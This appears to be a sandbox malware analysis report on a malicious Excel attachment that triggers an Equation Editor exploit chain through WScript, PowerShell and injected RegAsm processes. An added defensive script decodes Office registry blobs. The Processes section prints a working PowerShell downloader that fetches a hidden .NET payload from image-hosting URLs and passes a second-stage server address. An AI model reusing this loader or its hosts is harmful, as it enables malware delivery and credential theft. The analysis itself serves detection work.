Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
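
The `command` values in the "Set value (data)" rows above are REG_BINARY blobs that the table shows as raw hex. They are the UTF-16LE Windows Installer descriptors ("Darwin descriptors") that Office writes for advertised shell verbs: a 20-character compressed product code, a feature name, a '>' separator, a 20-character compressed component code and optional command-line arguments. Decoding them is the quickest way to confirm that these rows are Office 2010 re-registering its own HTML/MHTML verbs and not an attacker planting a handler. The script below is an added example, not part of the report; the three blobs are copied verbatim from the tables above, and the Word, Excel and Publisher labels come from the keys they were written under.

```python
"""Decode the REG_BINARY 'command' blobs recorded under the Office shell verbs.

Windows Installer stores a UTF-16LE "Darwin descriptor" in the `command` value of an
advertised shell verb: a 20-character compressed product code, a feature name, a '>'
separator, a 20-character compressed component code and, optionally, command-line
arguments. Decoding the blobs from the report shows Office 2010 re-registering its own
HTML/MHTML verbs, not attacker persistence.

Added example; the hex values are copied from the report's registry tables.
"""
from dataclasses import dataclass

# Blobs from the "Modifies registry class" / "Modifies Internet Explorer settings" tables
# (Word, Excel and Publisher verbs respectively).
WORD_VERB_HEX = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000"
EXCEL_VERB_HEX = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000"
PUBLISHER_VERB_HEX = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000"

COMPRESSED_GUID_LEN = 20  # a Darwin-compressed GUID is always 20 characters


@dataclass(frozen=True)
class DarwinDescriptor:
    product_code: str    # compressed GUID of the MSI product (shared by all verbs of one install)
    feature: str         # feature that owns the component, e.g. WORDFiles
    component_code: str  # compressed GUID of the component (the verb's executable)
    arguments: str       # trailing command-line arguments, '' if none


def decode_reg_binary_string(hex_blob: str) -> str:
    """Turn a REG_BINARY hex dump into text, assuming UTF-16LE with NUL terminator(s)."""
    raw = bytes.fromhex(hex_blob)
    if len(raw) % 2:
        raise ValueError("odd-length blob is not UTF-16LE")
    return raw.decode("utf-16-le").rstrip("\x00")


def parse_darwin_descriptor(text: str) -> DarwinDescriptor:
    """Split a descriptor into its fields; raises ValueError if the shape is wrong."""
    if len(text) < COMPRESSED_GUID_LEN + 1 or ">" not in text:
        raise ValueError("not a Darwin descriptor")
    product = text[:COMPRESSED_GUID_LEN]
    feature, _, tail = text[COMPRESSED_GUID_LEN:].partition(">")
    component = tail[:COMPRESSED_GUID_LEN]
    if len(component) != COMPRESSED_GUID_LEN:
        raise ValueError("truncated component code")
    arguments = tail[COMPRESSED_GUID_LEN:].strip()
    return DarwinDescriptor(product, feature, component, arguments)


def describe_verb(hex_blob: str) -> DarwinDescriptor:
    """Hex blob as recorded in the report -> parsed descriptor."""
    return parse_darwin_descriptor(decode_reg_binary_string(hex_blob))


if __name__ == "__main__":
    for name, blob in (("Word", WORD_VERB_HEX), ("Excel", EXCEL_VERB_HEX), ("Publisher", PUBLISHER_VERB_HEX)):
        d = describe_verb(blob)
        print(f"{name:9s} product={d.product_code} feature={d.feature} "
              f"component={d.component_code} args={d.arguments!r}")
```

The decoded arguments (`/n "%1"` for Word, `/dde` for Excel, `%1` for Publisher) match the plain-string `command` values written next to them, and all three blobs carry the same product code, which is what a single Office 2010 installation repairing its verbs looks like. A descriptor whose component or arguments pointed anywhere other than the Office install would be the thing to chase.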

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '...';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.REQ/1717/89.881.83.451//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

